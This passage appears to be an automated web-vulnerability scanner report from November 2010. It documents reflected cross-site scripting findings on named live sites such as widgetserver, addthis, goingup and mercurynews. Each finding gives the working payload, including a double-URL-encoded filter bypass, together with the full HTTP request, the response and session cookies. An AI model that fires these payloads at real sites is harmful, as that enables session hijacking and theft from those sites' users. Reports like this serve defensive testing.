Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 784
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1729
Date: Mon, 15 Nov 2010 02:51:14 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/lar/v10-003/c7/jsc/flr.js;qs=1f763'-alert(1)-'1a7b6ec85c8=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

3.32. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9 was submitted in the REST URL parameter 18. This input was echoed as 758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.siliconvalley.com%2F&wbx_useragent=Mozilla%2F4.0+%2
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:54:42 GMT
Expires: Thu, 18 Nov 2010 01:53:42 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
X-Pad: avoid browser bug
Content-Length: 6441

<response><widgets><widget><token>585223039983919a6cabeea767ed2376729872f60000012c47a42355758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9</token><app-id>52e35
...[SNIP]...

3.33. http://cdn.widgetserver.com/syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9baf<a>dc1d20d44e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/52e35ba2-8abd-48a3-8801-4f418493fee0c9baf<a>dc1d20d44e3/iv/11/n/code/nv/4/p/1/r/227bb7e7-2d16-4350-a382-d522568a9761/rv/36/t/585223039983919a6cabeea767ed2376729872f60000012c47a42355/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.siliconvalley.com%2F&wbx_useragent=Mozilla%2F4.0+%2
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:13:12 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1697

<response><widgets><widget><token>585223039983919a6cabeea767ed2376729872f60000012c47a42355</token><app-id>52e35ba2-8abd-48a3-8801-4f418493fee0c9baf<a>dc1d20d44e3</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

3.34. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 18]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/

Issue detail

The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257 was submitted in the REST URL parameter 18. This input was echoed as 2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.mercurynews.com%2Fnews&wbx_useragent=Mozilla%2F4.0+
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:54:30 GMT
Expires: Thu, 18 Nov 2010 01:53:30 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
X-Pad: avoid browser bug
Content-Length: 6365

<response><widgets><widget><token>eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257</token><app-id>58c04
...[SNIP]...

3.35. http://cdn.widgetserver.com/syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 101e4<a>9b600e0037f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/xml/i/58c04479-79ac-40a6-9463-ff079ae00951101e4<a>9b600e0037f/iv/4/n/code/nv/4/p/1/r/505d64dc-c6d5-4a6e-b0dc-75e597e8d2ef/rv/72/t/eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec/u/1/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cdn.widgetserver.com/syndication/flash/InsertWidget.swf?&wbx_ref=http%3A%2F%2Fwww.mercurynews.com%2Fnews&wbx_useragent=Mozilla%2F4.0+
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: cdn.widgetserver.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/xml;charset=UTF-8
Date: Mon, 15 Nov 2010 01:10:44 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1697

<response><widgets><widget><token>eda229e661158ebb9cf31bd9012ad93a1d87f54e0000012c47a25cec</token><app-id>58c04479-79ac-40a6-9463-ff079ae00951101e4<a>9b600e0037f</app-id><reg-id></reg-id><friendly-id>
...[SNIP]...

3.36. http://consumertipsonline.net/health/us4.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumertipsonline.net
Path:   /health/us4.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7593b\"><img src=a onerror=alert(1)>d68ba1043cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /health/us4.php?t=1239000/7593b"><img%20src%3da%20onerror%3dalert(1)>d68ba1043cd098\ HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45510


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Conte
...[SNIP]...
<a href="leanspa.php?t=1239000/7593b\"><img src=a onerror=alert(1)>d68ba1043cd098\\" target="_blank">
...[SNIP]...

3.37. http://consumertipsonline.net/health/us4.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://consumertipsonline.net
Path:   /health/us4.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 was submitted in the t parameter. This input was echoed as 3ea2e\"><img src=a onerror=alert(1)>88ccf899957 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /health/us4.php?t=1239000098\3ea2e"><img%20src%3da%20onerror%3dalert(1)>88ccf899957 HTTP/1.1
Host: consumertipsonline.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:52:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<meta http-equiv="Conte
...[SNIP]...
<a href="leanspa.php?t=1239000098\\3ea2e\"><img src=a onerror=alert(1)>88ccf899957" target="_blank">
...[SNIP]...

3.38. http://counter.goingup.com/js/tracker.js [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.goingup.com
Path:   /js/tracker.js

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload 2581e<script>alert(1)</script>b823be43aed was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/tracker.js?st=xpjgr2n&b=52581e<script>alert(1)</script>b823be43aed HTTP/1.1
Accept: */*
Referer: http://www.ucsc-extension.edu/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: counter.goingup.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 02:52:38 GMT
Content-Type: application/javascript
Connection: close
X-Powered-By: PHP/5.3.3
Last-Modified: Fri, 01 May 2009 04:00:00 GMT
Expires: Sun, 31 May 2009 04:00:00GMT
Cache-Control: max-age=2592000, must-revalidate
Content-Length: 5654
ETag: "d1c04dd92c7a5f6defbc39f8f406d84d"
Set-Cookie: SERVERID=c12; path=/

if(typeof (guTracked)=="undefined"||!guTracked){if(typeof (guSiteId)=="undefined"){var guSiteId="xpjgr2n"}if(typeof (guBadge)=="undefined"){var guBadge="52581e<script>alert(1)</script>b823be43aed"}if(typeof (guWType)=="undefined"){var guWType=""}if(typeof (guCookieLiveTime)=="undefined"){var guCookieLiveTime='3600'}if(typeof (guCookieGlobalExpTime)=="undefined"){var guCookieGlobalExpTime="3153
...[SNIP]...

3.39. http://counter.goingup.com/js/tracker.js [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.goingup.com
Path:   /js/tracker.js

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 96c02<script>alert(1)</script>228aa39f1fa was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/tracker.js?st=xpjgr2n96c02<script>alert(1)</script>228aa39f1fa&b=5 HTTP/1.1
Accept: */*
Referer: http://www.ucsc-extension.edu/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: counter.goingup.com
Proxy-Connection: Keep-Alive
Pragma: no-cache

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 02:52:38 GMT
Content-Type: application/javascript
Connection: close
X-Powered-By: PHP/5.3.3
Last-Modified: Fri, 01 May 2009 04:00:00 GMT
Expires: Sun, 31 May 2009 04:00:00GMT
Cache-Control: max-age=2592000, must-revalidate
Content-Length: 5650
ETag: "bf9c24cd125c4c6375e07a8262272f72"
Set-Cookie: SERVERID=c7; path=/

if(typeof (guTracked)=="undefined"||!guTracked){if(typeof (guSiteId)=="undefined"){var guSiteId="xpjgr2n96c02<script>alert(1)</script>228aa39f1fa"}if(typeof (guBadge)=="undefined"){var guBadge="5"}if(typeof (guWType)=="undefined"){var guWType=""}if(typeof (guCookieLiveTime)=="undefined"){var guCookieLiveTime=''}if(typeof (guCookieGlobalExpTime)
...[SNIP]...

3.40. http://ds.addthis.com/red/psi/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9fe88<script>alert(1)</script>fa305a07b2a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sat, 12 Feb 2011 23:11:03 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 14 Nov 2010 23:11:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 23:11:03 GMT
Connection: close

_ate.ad.hpr9fe88<script>alert(1)</script>fa305a07b2a({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

3.41. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 14 Nov 2010 23:11:23 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 42
ETag: "2aff5497e3b5794850e510b692b9bed9"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=6X8sDNEAER_0Ouv71eRO3g.93565265; path=/; expires=Mon, 14-Nov-2011 23:11:23 GMT
Set-Cookie: zvents_tracker_sid=6X8sDNEAER_0Ouv71eRO3g.93565265; path=/; expires=Mon, 14-Nov-2011 23:11:23 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYWMzOWQzMDcxMGYzOGRmMDYyNDZkY2U5NWI4N2ExYzYiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--73f95738d783d27b1e2bf4d6149a7fa91a710ab1; path=/; expires=Mon, 14-Feb-2011 23:11:23 GMT; HttpOnly
Content-Length: 73983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" />
...[SNIP]...

3.42. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Nov 2010 02:04:53 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.122.23.218
X-Runtime: 23
ETag: "bcb7e2c2be4eec9f2ac821e832d643d0"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiCWNpdHkiDVNhbiBKb3NlIgtyYWRpdXNpHiINbGF0aXR1ZGVmGjM3LjMxNjQ5OTk5OTk5OTk5OACXjSIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--b4a5a2069ac2cede71eeab9881eb479f97db86d4; path=/; expires=Tue, 15-Feb-2011 02:04:53 GMT; HttpOnly
Content-Length: 48358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" />
...[SNIP]...

3.43. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.mercurynews.com
Path:   /performers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
